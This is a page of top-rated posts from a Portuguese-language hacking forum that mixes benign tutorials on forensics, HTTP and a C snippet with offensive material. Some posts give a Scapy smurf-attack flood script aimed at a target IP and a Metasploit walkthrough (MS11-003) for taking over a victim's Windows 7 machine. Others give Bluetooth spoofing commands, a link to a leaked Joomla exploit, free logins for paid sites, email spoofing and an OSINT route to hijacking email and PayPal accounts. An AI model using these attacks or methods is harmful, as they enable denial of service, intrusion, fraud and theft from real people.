Ir para conteúdo
  • Anúncios

    • Gh0s7

      Roadsec São Paulo 2017 - Edição de Encerramento   10/04/17

      ATENÇÃO A mega edição de encerramento da Roadsec São Paulo 2017 está incrível e contará com a presença de grandes nomes da área de Segurança da Informação, Nacional e ícones internacionais também! Nós da Fsociety Brasil somos parceiros da Flipside e vamos sortear três ingressos para os membros da nossa comunidade, em breve lançaremos a promoção. Para mais informações sobre o evento, verifique no link: http://bit.ly/2xymLUf

Tabela de Classificação


Conteúdo Mais Visto

Exibindo conteúdo com a maior reputação desde 9em todas áreas

  1. 4 pontos
    brazzers funcionou galera, é nóis
  2. 3 pontos
    Mr. Robot, episódio 6. Como de costume, não decepcionante. Mais uma vez, nosso herói, Elliot, usou seu extraordinário intelecto e habilidades de hacking para nos inspirar. Neste episódio, Elliot está sendo chantageado pelo traficante de drogas implacável, Vera, para tira-lo da prisão. Shayla esta sendo refém e Elliot tem até a meia-noite para invadir o sistema de computador da cadeia para liberá-lo. Elliot tenta explicar a Vera que tal invasão não pode ser feita em questão de horas, mas sim dias ou semanas para encontrar uma vulnerabilidade de segurança que ele possa explorar. Pendrive malicioso Em sua primeira tentativa de invadir a prisão, Elliot e Darlene, sua parceira da Fsociety, "acidentalmente" deixam cair pendrives infectados perto da prisão. A estratégia aqui é que se alguém dentro da rede da prisão pegar um e inseri-lo no seu sistema de computador, irá ter injetado um malware e assim dando uma entrada para Elliot. Como esperado, um oficial pegou um e inseriu em seu computador. Elliot foi capaz de ter uma conexão remota, mas antes de poder fazer qualquer coisa, o software AV (antivírus) detecta a intrusão e desconecta Elliot. Elliot então questiona Darlene por ela ter pego um malware já conhecido (pelos antivírus, no caso), ao invés de desenvolver um próprio malware e então Darlene se defende dizendo que só tinha meia-hora. A rede Enquanto Elliot está visitando Vera na prisão, ele traz seu telefone com ele, no qual ele instalou um aplicativo de scanner Wi-Fi. Com esse scanner, ele pode ver todos os APs sem fio e vê que todos estão usando WPA2. Embora ele saiba que pode quebrar WPA2, porem o tempo é curto para que ele possa fazer um bruteforce na rede. No processo de descoberta de hotspots sem fio e tecnologias de criptografia com seu telefone, Elliot vê uma conexão Bluetooth quando o carro de um agente passa perto dele. Isso estimula Elliot a uma nova estratégia, invadir o Bluetooth e entrar no sistema de computador da prisão através da conexão dedicada do carro da policia à prisão. A estratégia de Elliot aqui é falsificar a conexão Bluetooth do carro da polícia com o teclado. Se ele pode fazer o laptop acreditar que seu teclado é realmente o teclado do policial, ele pode controlar o laptop do policial e entrar na rede da prisão. Uma vez dentro da rede, ele pode enviar malware para assumir o controle dos sistemas controlados digitalmente da prisão. Ativando o Bluetooth Antes que Elliot possa fazer qualquer coisa, ele precisa habilitar o Bluetooth em seu sistema: service bluetooth start Em seguida, ele precisa ativar o dispositivo Bluetooth: hciconfig hci0 up Então ele verifica se ele realmente está funcionando, digitando: hciconfig hci0 Observe o "Endereço BD" na segunda linha - este é o endereço MAC do dispositivo Bluetooth. Procurando dispositivos Bluetooth A primeira coisa que Elliot no processo de invasão é procurar conexões Bluetooth. Se você olhar de perto a tela de Elliot, você pode ver que ele está usando o hcitool, uma ferramenta de configuração Bluetooth integrada no Kali Linux. Embora isso funcione, tive um melhor desempenho com o btscanner, um scanner Bluetooth. Para usá-lo, digite: btscanner Em seguida, selecione "i" para iniciar uma verificação de inquérito. Você pode ver os resultados abaixo. Usando o btscanner, podemos obter uma lista de todos os dispositivos Bluetooth por perto. Este aqui tem um endereço MAC e um nome de "Tyler" - para falsificar este dispositivo, devemos falsificar o endereço MAC e o nome do dispositivo. É assim que Elliot recebe o endereço MAC e o nome do dispositivo Bluetooth do carro do policial. Lembre-se de que o Bluetooth é um protocolo de baixa potência com um alcance de apenas cerca de 10 metros (embora com uma antena direcional, distâncias até 100 metros foram alcançadas). Spoof o endereço MAC do teclado Agora que Elliot tem o nome e o endereço MAC do teclado do policial, ele precisará clonar o teclado do policial com essas informações. O Kali Linux possui uma ferramenta projetada para spoof de dispositivos Bluetooth chamados de spooftooph. Podemos usá-lo para falsificar o teclado com um comando semelhante a este: spooftooph -i hci0 -a A0:02:DC:11:4F:85 -n Car537 -i Determina o dispositivo, neste caso hci0 -a Determina o endereço MAC que queremos falsificar -n Determina o nome do dispositivo que queremos falsificar, neste caso "Car537" Se o fizermos corretamente, nosso dispositivo Bluetooth irá falsificar o endereço MAC e o nome do dispositivo Bluetooth do computador do policial. Para verificar se foi bem sucedido, podemos usar o hciconfig seguido do dispositivo e o "nome" do switch que irá listar o nome do dispositivo. Lembre-se, este é o nosso dispositivo Bluetooth que estamos tentando emular com o dispositivo Bluetooth do carro de polícia. Se tivermos sucesso, ele terá o mesmo endereço MAC e o nome do dispositivo Bluetooth do policial. hciconfig hci0 name Agora, temos um dispositivo Bluetooth que é um clone perfeito do teclado Bluetooth do carro da polícia! O link do serviço bluetooth para o laptop do policial Agora é aqui onde o roteiro e realidade de Mr. Robot se divergem. O hacking de Mr. Robot é realista, porém as vezes, o diretor precisa deixar as coisas um pouco mais fictícias. E isso é permitido pois as obras não devem se limitar pela realidade. Para que o Eliot se conecte agora ao laptop do carro de polícia, ele precisaria da chave de link (esta é uma chave para identificar o dispositivo Bluetooth previamente emparelhado) que foi trocada entre o teclado e o adaptador Bluetooth no laptop. Ele poderia adivinhar (improvável) ou crack-lo, mas não será tão rápido como apareceu no show. Outra possibilidade é que, quando o sistema foi reiniciado ou o teclado foi desconectado, Elliot pode se conectar ao laptop, pois é um clone do teclado do policial. Em ambos os casos, levaria mais tempo do que Elliot tinha neste episódio para cortar o teclado Bluetooth do policial. Hackeando a prisão Na etapa final, Elliot usa o computador hackeado do policial para fazer upload de um malware via FTP, que lhe dará o controle das portas das celas da prisão. Poucas pessoas sabem que prisões e outros sistemas industriais, muitas vezes usam SCADA (Sistemas de Supervisão e Aquisição de Dados). Estes sistemas industriais possuem PLCs. Presumivelmente, essa prisão tinha PLCs controlando as portas das celas da prisão (uma suposição muito razoável) e o malware de Elliot infectou-os e lhe deu controle, permitindo-lhe abrir todas as celas, liberando Vera e todos os outros prisioneiros.
  3. 3 pontos
    Eae galera, hoje vou ensinar a vocês como conseguir login free em sites pagos Você inicialmente só precisa do domínio do site que deseja uma conta (no caso eu usei o mesmo do tutorial de Bypass, o iknowthatgirl.com). Irá acessar o site LOGIN2.ME Caso você apenas saiba o subdomain de memberlogin, o domínio original fica após o ponto, no caso o do iknowthatgirl era members2.iknowthatgirl.com/access/login, então após o members2. vem o site no caso iknowthatgirl.com. Insere no primeiro campo e clica em Get. Após isso o site irá te dar um Login e Password. Após isso é só ir até a area de memberlogin do site desejado e logar. Caso não funcione clique em Not working, show me more. E irá aparecer outro Login e Password. Provavelmente não serão todos os sites que irá funcionar isso, porém, a melhor forma de descobrir é testar. Tutorial retirado da shadow By: Dr3w
  4. 2 pontos
    Esse tutorial mostra de maneira simples e rápida como derrubar um roteador com qualquer distribuição linux (ou a maioria), lembrando que só funciona se a rede estiver no alcance do atacante.
  5. 2 pontos
    Esse site iknowthatgirl.com é um site para procurar pessoas desaparecidas?
  6. 2 pontos
    Fala galerinha, estou trazendo um servidor de sms gratis Segue o link http://torpedogratis.org/
  7. 2 pontos
    Ora ora, parece que temos um Hacker aqui!
  8. 2 pontos
    Sim, você leu certo. Imagine invadir contas bancarias através de informações postadas no Facebook. Não é novidade que usuários de redes sócias expõe seus dados para o publico. ANTES DE COMEÇAR O TUTORIAL QUERO QUE SAIBAM QUE TUDO QUE FOI CRIADO AQUI É FALSO (CONTAS E DADOS BANCÁRIOS). Vamos a pratica. Eu descobri esse método logo após uma atualização do Facebook, nela, você pode procurar quaisquer publicações. No meu exemplo de busca, buscarei por email + um site de banco. Podemos observar que, com uma simples busca + filtrar resultados, o próprio Facebook nos retornou o que queríamos. Nessa jogada de dork, já temos um perfil verdadeiro + email + detalhes de custo + sabemos que temos uma conta no paypal + detalhes extras. Com essas informações, o engenheiro social já pode atacar. Você ainda pode explorar o perfil, descobrindo o nome da mãe, cachorro, cidade natal, cidade de nascimento, data de aniversario e entre outras coisas. Partimos agora para os privilégios, exploração da conta do email. Sabemos que contas de correios eletrônicos tem falhas se forem mal configuradas. Irei mostrar isso em outro tutorial. Porem, usamos as informações obtidas coletadas da vida da vitima. Podemos adquirir acesso ao email descobrindo as principais perguntas de segurança. Nome da mãe, cidade que nasceu, professora da X serie e assim por diante. Existem VÁRIAS maneiras de se conseguir acesso a uma conta de email. Sabendo o login do email de alguém, você pode fazer um estrago. Agora que tenho acesso a conta de email, sem precisar de nenhuma senha, vamos redefinir a senha da conta do Paypal e ganhar acesso total. Solicitando a recuperação de senha e a alteração a configuração da conta, conseguimos total acesso a conta Paypal. Galera, sei que foi um tutorial rápido e sem muita pratica, mas queria mostrar mesmo a vocês o perigo de você ou os seus familiares postarem informações sigilosas em redes sociais, ou até mesmo, deixando o perfil aberto para o publico. Espero que vocês tenham gostado, e eu vou tentar trazer os principais "bypass" em contas de correiro eletrônico . Em caso de duvida, irei responder.
  9. 1 ponto
  10. 1 ponto
    olá pessoa hoje venho mostrar como recuperar dados com softwares específicos para área de forense . vamos utilizar os seguintes softwares: Autopsy // proximo tutorial FTK imager OSFmount Mini tool power data recovery lembrando que os softwares citados são todos freeware ou seja free. vamos usar um pendrive que tinha algumas imagens e então formatei para fazer a recuperação em seguida vamos fazer copias do mesmo para não corromper os arquivos no dispositivo original e assim diminuindo as chances da recuperação é ai que entra o FTK imager a função deste software é copiar byte por byte e criar uma imagem... Depois selecione a partição logica e seu pendrive Depois click em ADD Aqui você ira escolher o formato que deseja salvar, vamos usar E01 Aqui é apenas para por o nome numero do caso entre outras especificações Aqui iremos escolher onde salvar o arquivo dar o nome a ele no caso tutorial como na imagem abaixo Deixe igual a imagem as configurações e FINISH depois em START So aguarda Depois disso será criado dois arquivos o da imagem e um arquivo.txt que contem os dados e a hash Que são muito utilizadas para comparação no caso para comprovar autenticidade do arquivo. Agora vamos injeta o pendrive e emular a imagem com o programa OSFmount aqui é bem simples você clica em Mount new seleciona onde esta a imagem.E01 como o print acima e Ok o programa ira montar o pen drive exatamente como o original Agora aqui que entra o mini tool data recovery Selecione a imagem montada e click em FULL SCAN Voala Então pessoal é isso espero que ajude vocês vou parar por aqui que já ficou muito grande esse tutorial e se quiserem ver como usa o autopsy eu faço um tutorial mostrando sobre ele vlw fui
  11. 1 ponto
    Boa iniciativa. O tutorial ficou massa. Mas saka, o segundo programa para emular a .E01 não é necessário. O próprio FTK Imager faz esse trabalho. E recomendo, se a intenção é copiar um dispositivo, utilizar a opção physical drive. A opção lógical drive copia uma partição lógica. Como falamos de um pendrive, não faz diferença pois um pendrive tem a característica de ter partições gerenciadas. Não faz sentido particiona-lo. Isso só ocorre quando o pendrive é corrompido. Mas o indicado, para que você de fato colete tudo, é utilizar a physical como opção na hora de falar a coleta da evidência. E fique sempre atento ao utilizar o formato .E01, ele é próprio da FTK(Forensic Tool Kit) e existem softwares que só fazem leitura do formato RAW ao em vez do .E01. Poste mais tutoriais sempre de quer. Trocar ideias é sempre bom.
  12. 1 ponto
    Estou a um tempo off mas segue o baile: Passo a Passo para analisar potenciais evidências em histórico de navegação do navegador Google Chrome: (FullBr) http://academiadeforensedigital.com.br/investigacao-forense-em-chrome/
  13. 1 ponto
    Agora fodeu para apagar os +18 KKKKKKKKKKKKKKKKKKKKKKK
  14. 1 ponto
  15. 1 ponto
    Fala jovens, beleza? Hoje quero apresentar para vocês uma falha já bastante antiga, mas ainda explorável e muito eficaz: Smurf Attack! Para fazer esse ataque vamos usar o seguinte comando no scapy: send(IP(src="IP-ALVO", dst="IP-BROADCAST")/ICMP()) Basicamente fazendo isso acontecerá o seguinte: Um pacote ICMP com a origem falsificada usando o IP do alvo será enviado para o endereço de broadcast da rede. Dessa forma esse mesmo pacote será retransmitido para todos os hosts da rede. Como consequência esses hosts enviaram um pacote como resposta para o nosso alvo. Agora multipliquem isso por vários hosts e vários pacotes ... Dá pra fazer um estrago! rs Para potencializar o ataque, no python podemos escrever: import time from scapy.all import IP, ICMP, send while (1==1): send(IP(src="IP-ALVO", dst="IP-BROADCAST")/ICMP()) time.sleep(5) Com isso fazemos com que os pacotes sejam enviados repetidamente até que o script seja parado. O sleep serve para evitar que um número excessivo de pacotes seja enviado em curto espaço de tempo causando lentidão na rede, você pode alterar os segundos da função conforme a sua necessidade. É isso pessoal, boa diversão para todos!
  16. 1 ponto
    FSC Linux trata-se de uma remasterização baseada no Ubuntu criada para o grupo. Estou criando apenas visando a identificação e popularidade do grupo Fsociety Brasil. Se você tiver uma ferramenta própria que acha que será útil por na Distro, qualquer dica será bem vinda. Ela tem poucas ferramentas no momento, não pretendo instalar muitas (algumas instaladas não aparecem no menu), mas se tiver alguma de interesse, deixe a dica. Base: Ubuntu 16.04.2 Interface: XFCE Arquitetura: 64 bits (não haverá versão 32 bits) Mais informações: https://fsocietybrasil.org/fsociety-linux-o-linux-da-fsociety-brasil/ DOWNLOAD (versão alpha 1.0)
  17. 1 ponto
    Eu também não sei por que, mas vejamos que é algo muito complexo fazer um programa completo. E muitas das vezes uma interface seria muito poluída por que os caras que mais sabem esses assuntos técnicos não manjam nada de design.
  18. 1 ponto
  19. 1 ponto
    Hoje trago para vcs, um site que permite que vc envie email se passando de por outra pessoa https://emkei.cz/ da pra usar de diversas formas, use com responsabilidade
  20. 1 ponto
    E ae galera, trago pra vocês uma API de um site que mostra onde o email esta cadastrado. O site é pago, então se você for continuar usando você vai precisar criar outra conta ou pagar. Uma hora a key da API inspira. Vamos nos registrar. 1. Entre no site: pipl.com/api 2. Clique em start for free e registre-se. Após terem confirmado o email, entrem na conta. Depois vá em API Clique em "GET MY FULL API KEYS" Copie uma key, de preferencia a do tópico "Social". Não precisa copiar tudo, copie apenas depois do hífen do DEMO Exemplo: SOCIAL-PREMIUM-DEMO-fijegjierij34k523kitrmk copie apenas o fijegjierij34k523kitrmk Depois, abra um terminal e digite: curl http://api.pipl.com/search/\?email=EMAIL\&key=KEY | grep -i 'url' Exemplo: curl http://api.pipl.com/search/\[email protected]\&key=fijegjierij34k523kitrmk | grep -i 'url'
  21. 1 ponto
    int main(void){ char string[1024]; while(1){ scanf("%s",&string); if(string[0] == 'e' && string[1] == 'x' && string[2] == 'i' && string[3] == 't' && string[4] == '\0') // Toda string termina com \0, ficaria assim exit\0 que delimita onde terminou o texto digitado. printf("Bye \n"); break; } return 0; }
  22. 1 ponto
    CMS significa Custom Management System ou Sistema de Gerenciamento de Conteúdo ,é um aplicativo usado para criar, editar, gerenciar e publicar conteúdo de forma consistentemente organizada permitindo que o mesmo seja modificado, removido e adicionado com facilidade Deixo alguns exemplos WordPress é um aplicativo de sistema de gerenciamento de conteúdo para web, escrito em PHP com banco de dados MySQL, voltado principalmente para a criação de sites e blogs via web . download Joomla! (pronuncia-se djumla) é um dos principais sistemas de gestão de conteúdo da atualidade . A separação entre design, programação e conteúdo permite uma grande flexibilidade na produção de sites com design extremamente personalizado . download MyBB é um software de sistema de fóruns (bulletin board system) desenvolvido pelo grupo MyBB, é escrito utilizando as linguagens PHP e MySQL download Anahita é uma estrutura e plataforma de rede social para construir aplicativos e aplicativos de compartilhamento de conhecimento. download MOODLE é o acrónimo de "Modular Object-Oriented Dynamic Learning Environment", um software livre, de apoio à aprendizagem, executado num ambiente virtual (ver ambiente virtual de aprendizagem). A expressão designa ainda o Learning Management System (Sistema de gestão da aprendizagem), EAD (ensino a distância). download
  23. 1 ponto
    Ferramenta para achar local Admin (link no final do tópico) Requerimentos: Python 2.7 mechanize PySocks beautifulsoup4 html5lib Nmap (--nmap) TOR (--tor) Instalação: Linux git clone http://github.com/fnk0c/cangibrina.git cd cangibrina pip install -r requirements.txt Uso uso: cangibrina.py [-h] -u U [-w W] [-t T] [-v] [--ext EXT] [--user-agent] [--tor] [--search] [--dork DORK] [--nmap [NMAP]] Rápido e poderoso admin finder argumentos opcionais: -h, --help mostra esta mensagem de ajuda e sai -u U site alvo -w W define wordlist (padrao: wl_medium) -t T define numero de threads (padrao: 5) -v habilita verbose --ext EXT filtra diretorio pela extensao do alvo --user-agent modifica user-agent --tor define TOR proxy --search usa google and duckduckgo para procurar --dork DORK define dork personalizada --nmap [NMAP] usa nmap para escanear portas e servicos Exemplos python cangibrina.py -u facebook.com python cangibrina.py -u facebook.com -v python cangibrina.py -u facebook.com -w /root/diretorios.txt -t 10 -v python cangibrina.py -u facebook.com --search -v python cangibrina.py -u facebook.com --search --dork 'site:facebook.com inurl:login' python cangibrina.py -u facebook.com -v --nmap python cangibrina.py -u facebook.com -v --nmap 'sudo nmap -D 127.0.0.1 -F facebook.com' python cangibrina.py -u facebook.com --user-agent python cangibrina.py -u facebook.com --ext php [IMPORTANTE] DORK DEVE SER ESCRITA ENTRE ASPAS ! [Exemplo] 'inurl:login.php' Cangibrina
  24. 1 ponto
    Infoweb | Ferramenta para coleta de informaçoes e e-mails de sites Eae galera, codei ssa tool aqui bem simples, que faz uma requisição ao site e retorna algumas informações e endereços de e-mails. Pode ser bem útil na técnica da coleta de informações quando estiver realizando um pentest. Espero que gostem... ############################################ LINK: https://pastebin.com/L7Z3YiGK
  25. 1 ponto
    Esse segundo post tratará da introdução do assunto, dando uma olhada mais técnica do Requests, ainda não será a objetiva, mas será um pouco mais técnica que a primeira, onde a gente tratou da apresentação da série. DESCOBRINDO REQUESTS #1 - Apresentação: Site oficial: http://docs.python-requests.org/en/master GitHub: https://github.com/requests/requests Modelo OSI Modelo OSI (Open System Interconnection) é uma padronização criada pela ISO que tem como objetivo padronizar, separando em diversas camadas, a comunicação entre dois sistemas de computadores (end-to-end) fazendo com que dispositivos de marcas diferenciadas e possam se comunicar sem problemas algum. As camadas se separaram de acordo a função. Além desse, há ainda o padrão TCP/IP. São 7 camadas, que descrevem várias funções diferenciadas, são elas: 7ª Camada: Aplicação - Essa camada descreve a especialização da comunicação homem-máquina, sendo assim descreve como um software irá tratar requisições seguindo certo protocolo. É uma camada totalmente de software, alguns exemplos de protocolo são HTTP, FTP, SSH e IMAP. 6ª Camada: Apresentação - Camada de "tradução", é a camada responsável por converter os dados apresentados em um formato reconhecido por ambos os lados, além disso, essa camada é responsável por trabalhar com criptografia. Um bom exemplo é o protocolo TLS. 5ª Camada: Sessão - É camada responsável por salvar os dados na transmissão dos dados, no caso do HTTP (que é um protocolo stateless), cookies salvam a sessão. 4ª Camada: Transporte - Responsável por transmitir os dados, ou seja, levar os dados de um lado a outro da comunicação. Se localiza entre as duas partes da comunicação, a de software e a de hardware e inclui ainda partes do controle do fluxo, manejamento dos erros e ordem de pacotes. São dois exemplo clássicos o UDP e o TCP. 3ª Camada: Rede - Camada responsável pelo enrederçamento e envio direto dos pacotes (exemplo os roteadores trabalham nessa camada). São exemplos os protocolos ARP, IP e NAT. 2ª Camada: Enlace - Camada responsável pela leitura dos dados brutos da comunicação, checando erros e repassa à primeira camada. Exemplos: Ethernet, 802.11Q, Frame Relay. 1ª Camada: Física - É basicamente a camada responsável por converter as pulsações elétricas recebidas para converter em dados de software, e vice-versa. Dentro os protocolos estão Modem, Bluetooth e USB. Introdução ao HTTP O nome HTTP vem do inglês HyperText Transfer Protocol (Protocolo de transferência de hipertexto), que indica a transferência de texto pela internet. Esse protocolo trabalha na 7ª camada do modelo OSI e sofreu grandes modificações durante os anos, atualmente estamos numa transição para sua segunda versão, o HTTP2 ou HTTP/2.0. Mas na maioria vemos a transmissão ocorrer pelo HTTP/1.1. O protocolo HTTP possui métodos (ou verbos) que funcionam de diferentes maneiras, esses métodos são: GET O método GET serve para pegar dados da web, é usado para receber os dados e pode receber alguns parâmetros, como exemplo numa pesquisa no Youtube, ao pesquisar você encontrará na URL: https://www.youtube.com/results?search_query=funny Você está buscando no host youtube.com o caminho /results e enviando o parâmetro search_query com o parâmetro funny. POST É usado para enviar informações a um website, geralmente causa uma mudança no servidor ou tem algum efeito direto. Esse método é usado em logins, por exemplo, onde temos: <form action="login.php"> <input type="text" name="email"> <input type="password" name="passwd"> <input type="submit" name="send"> </form> Ao clicar no botão enviaremos ao login.php os valores contidos na área email e passwd. HEAD Mesmo que GET, mas não o servidor não retorna a resposta somente o cabeçalho. PUT Posta essas informações no servidor, substituindo ou repondo os dados casos já existam. PATCH Aplica uma modificação parcial no dado referente. DELETE Apaga o dado correspondente ao argumento enviado. CONNECT Estabiliza um tunelamento cliente-servidor. OPTIONS É usado para descrever as opções usadas na comunicação pela fonte (cliente). TRACE Descreve uma mensagem loop-back de test para o alvo (servidor). Cabeçalhos e Resposta Basicamente, no HTTP você envia um cabeçalho ao servidor contendo informações como cookies, versão HTTP, segurança, referente, User-Agent, parâmetros, formatos suportados e etc. E o servidor te retorna dados segundo sua especificação, contendo por exemplo versão HTTP, código de status, formato dos dados, servidor que eles usam, setam cookies, etc. Para representar, vou isso é mais ou menos o que seu browser envia a um servidor: Padrão de pedido: PROTOCOLO CAMINHO VERSÃO_HTTP Host: HOST Cookie: COOKIES User-Agent: NAVEGADOR Accept: FORMATO DE SUPORTE Accept-Encoding: FORMATO DE COMPAC. [LINHA EM BRANCO] ... (corpo da mensagem) EXEMPLO MÉTODO GET: GET / HTTP/1.1 Host: facebook.com Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1 Padrão de resposta: VERSÃO_HTTP CÓDIGO_STATUS DESCRIÇAO_STATUS Content-type: text/html Set-Cookie: NOME_COOKIE=VALOR Content-Encoding: COMPACT. [LINHA EM BRANCO] ... (corpo da mensagem) EXEMPLO RESPOSTA: HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: Doce=Chocolate Content-Encoding: gzip <html> <head> ... </head> <body> ... </body> </html> No método post, os dados são enviados como no corpo da mensagem. Assim: POST /login.php HTTP/1.1 Host: facebook.com Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1 [email protected]&password=minhasenha E ainda vale salientar que com o protocolo TLS, e métodos de segurança SSL, o envio é criptografado e não interceptável pelo Wireshark. Para capturar esses dados eu apresento a função de desenvolvedores dos navegadores, somente apertando botão direito na página e em "Inspecionar elemento", depois na aba network você poderá monitorar o trafego na rede. No Firefox ainda tem extensões como o Firebug e o HTTPFox. Códigos de retorno Como dito, no cabeçalho de retorno, o segundo dado a aparecer é justamente o código de status. Esse código descreve o status do pedido. Para isso temos alguns padrões básicos: Faixa 1xx: Informativa, informa estados do pedido, não exprime necessariamente o resultado dele. Faixa 2xx: Código de sucesso, o 200 é o OK. Faixa 3xx: Códigos de redirecionamento; Faixa 4xx: Representam problemas no cliente, exemplo: 404 é o Not Found. e 405 é o Forbidden Faixa 5xx: Representa alguns outros erros, exemplo o 502 é Bad Gateway e o 503 é Service Unavailable Por hoje é só, daqui para o próximo post eu ainda vou ver do que eu vou tratar. Vlw pessoal!! Deem um feedback para que eu possa continuar postando essa série! E qualquer dúvida, deixem aí nas respostas.
  26. 1 ponto
    Fala pessoal tudo bem ? =) Tô de volta e trouxe mais uma novidade pra vocês , um compilado de vidéos sobre róbotica pra quem tem interesse de aprender sobre é sempre bom. mas antes de mais nada o que é robótica ? "Ciência , técnica ou concepção utilizada pra se fabricar robôs." Tem muito mais coisa envolvida mas isso você só vai você se ver os videos . link http://bit.ly/2fw2JTO
  27. 1 ponto
    Exploit vazado da equipe de hacker @Yunkers Crew Exploit: https://github.com/2inf3rnal/foxcontact/ Video demostrativo do exploit https://www.youtube.com/watch?v=Z5HoCq4th7g Font: Yunkers Crew
  28. 1 ponto
  29. 1 ponto
  30. 1 ponto
  31. 1 ponto
    Há alguma forma de se precaver contra isso?
  32. 1 ponto
    E ae galera, hoje eu estarei mostrando o perigo de uma só maquina rodando varios serviços. Em meu laboratório eu montei 3 maquinas: - Ubuntu (servidor) - Windows 7 (cliente) - Kali Linux (atacante) Ubuntu.: SSH + Sistema de Update de Software da Empresa. Windows Xp.: Cliente. O ataque - Planejamento 1/3 Antes de mais nada, conhecer a empresa alvo! Saber como ela funciona é importante, com que tipo de produto ela trabalha, quantos funcionários trabalham la dentro, cargos dos funcionários e por ai vai. Ferramentas usadas: - whois - maltego - facebook Whois Levantando as informações da empresa com o Whois, podemos descobrir muitas coisas: Maltego Com o Maltego eu consegui alguns emails de funcionários e varias coisas relacionadas a empresa: Facebook Com o Facebook, eu descobri quem trabalha la e qual setor: O ataque - Reconhecimento 2/3 Nessa hora o atacante vai descobrir o tipo de tecnologia da empresa, como ela funciona e etc. Ferramentas usadas: - nmap - builtwith Nmap Com o Nmap descobrimos as portas abertas e seus serviços: Builtwith Com o builtwith descobrimos o que esta rodando no sistema web: O ataque - Explorando 3/3 Agora a parte de juntar tudo e explorar. Sabendo agora como a empresa funciona e qual sua tecnologia, eu preciso achar uma maneira de entrar. Vendo que os serviços estão todos atualizados, o atacante as vezes tem que sair de seu local de ataque e se arriscar para invadir fisicamente. Analisando a empresa de perto, descubro um access point que um funcionário deixou. Esse access point esta ligado junto com a rede principal, com isso eu consigo entrar na rede. Sabendo que à um serviço SSH, ele descobre o IP interno que esta rodando. Entretanto, tudo esta atualizado, porem sem proteção. Eu notei algo, o servidor SSH esta e mandando pacotes para outro IP dentro da rede. Logo eu planejei um ataque: - Preciso derrubar a conexão SSH entre as duas maquinas. - Depois delas se desconectarem eu faço um ataque MITM. - Com isso eu consigo o login do SSH. Feito! Eu estava navegando no sistema até que descubro que aquela mesma maquina, também fornece updates para os softwares da empresa. Eu conseguir modificar o update e conseguir coloca uma backdoor, nisso os clientes acham que é uma atualização. Com isso, eu não apenas afeto a empresa, mas sim também, os clientes. Cliente: Eu:
  33. 1 ponto
    Tem sim, um bem famoso aliás. O famoso "Crunch", com ele você é capaz de realizar proezas no quesito wordlist! Veja como usar aqui: https://fsocietybrasil.org/como-criar-uma-wordlist-com-o-crunch/
  34. 1 ponto
    Eae galera este é o meu primeiro post neste fórum com intuito de compartilhar conhecimento . Então, o tutorial é sobre a exploração do Windows 7 com o uso da CVE 2010-3971. Já é um exploit antigo, pois foi descoberto em 2010, mas ainda pode-se brincar com o mesmo . Atualmente, a maioria das pessoas têm as versões de seus browsers, atualizadas. Não com as últimas atualizações, mas atualizações necessárias, para que se torne quase impossível fazer uma invasão com este exploit(é como se tivessemos a tentar invadir um servidor FTP moderno, usando o exploit VSFTPD v2.3.4, quase impossível). Por isso, que é necessário sempre fazer um fingerprint, para que seja possível descobrir o SO, versões do sistema atuais e etc, e assim poder efetuar uma invasão com base na vulnerabilidade descoberta . Então, vamos fazer uma invasão numa máquina virtual(a vossa escolha, eu estarei a usar o virtualbox),nela deverá estar instalada uma versão antiga do Internet Explorer no Windows 7(recomendado), pois somente irá funcionar nesse browser e nessa versão antiga . 1. Tendo o metasploit instalado, abra o msfconsole . 2. Selecione o exploit "exploit/windows/browser/ms11_003_ie_css_import" 3. use o comando "show options" para ver os campos que devem ser preenchidos, e caso queira mais informações em relação ao exploit, use o comando "info" . Eu recomendo apenas colocar o seu endereço ip local, e manter o resto , principalmente a porta que será usada, para a conexão com a máquina da vítima . 4. Após preencher os dados, use o comando "exploit" para colocar o metasploit no modo listening( é modo que aguarda por conexões ). E será gerado um link. 5. Copie o link que foi gerado, e abra o Internet Explorer do Windows da maquina virtual(ou da vítima), cole o link na URL do browser . 6. E por fim, com o comando "sessions", selecione a sessão onde a vítima se encontre .E pronto você está dentro da máquina da vítima . DESFRUTE! By: darkAsylum00
  35. 1 ponto
    ATAQUES DE ENGENHARIA SOCIAL: TUDO QUE VOCÊ PRECISA SABER! Chamamos de engenharia social qualquer estratégia não-técnica usada pelos hackers que, em grande parte, dependem da interação humana e geralmente envolvem iludir o usuário para desrespeitar práticas de segurança padrão, como abrir links maliciosos, baixar arquivos suspeitos ou compartilhar informações confidenciais que permitam ao hacker atingir seus objetivos. O sucesso das técnicas de ataques de engenharia social depende da habilidade do hacker demanipular as vítimas para que executem certas ações ou ofereçam informações. Como não envolve nenhum aspecto técnico que possa ser reconhecido pelas ferramentas de segurança tradicionais, os ataques de engenharia social estão entre as maiores ameaças às empresas atualmente. ]A maior diferença entre os ataques de engenharia social e o trabalho de hacking tradicional é que os ataques de engenharia social não envolvem o comprometimento ou a exploração de softwares ou sistemas. Quando é bem-sucedido, esse tipo de ataque permite que os hackers ganhem acesso legítimo a informações confidenciais. Como funcionam os ataques de engenharia social Hackers que recorrem a ataques de engenharia social não deixam de ser fraudadores e estelionatários. Eles usam técnicas do tipo com o objetivo de ganhar acesso legítimo à rede e aos dados da empresa roubando credenciais de usuários autorizados para se passar por funcionários da própria empresa. Um dos hackers mais famosos do mundo, começou muito jovem a praticar engenharia social para pequenos ganhos. Chegou a revirar o lixo de empresas para conseguir informações e fazer telefonemas enganosos (você pode conhecer um pouco mais sobre essa história clicando É comum que esse tipo de cibercriminoso se aproveite da inocência e da natureza prestativa de alguns usuários. Eles podem, por exemplo, ligar para algum deles simulando ter de resolver algum incidente, dizendo então que necessita do acesso urgente à rede corporativa. Os ataques também podem ser feitos por meio das redes sociais. Os cibercriminosos podem apelar a uma série de sentimentos por meio dos perfis de redes sociais das vítimas, descobrindo, por exemplo, sua posição dentro da empresa, seus amigos e seus gostos pessoais. As táticas servem para convencer os usuários a abrir anexos infectados com malwares, persuadir funcionários a divulgar informações sensíveis ou até assustá-los para que instalem softwares infectados com malwares. Principais tipos de ataques de engenharia social Os tipos mais comuns de ataques de engenharia social incluem baiting, phishing, pretexting, quid pro quo, spear phishing e tailgating. Soluções como firewalls, filtros de e-mail e ferramentas de monitoramento da rede e de dados podem ajudar a mitigar essas ameaças, porém, a conscientização do usuário é a tarefa mais importante para combater os ataques de engenharia social. Contar 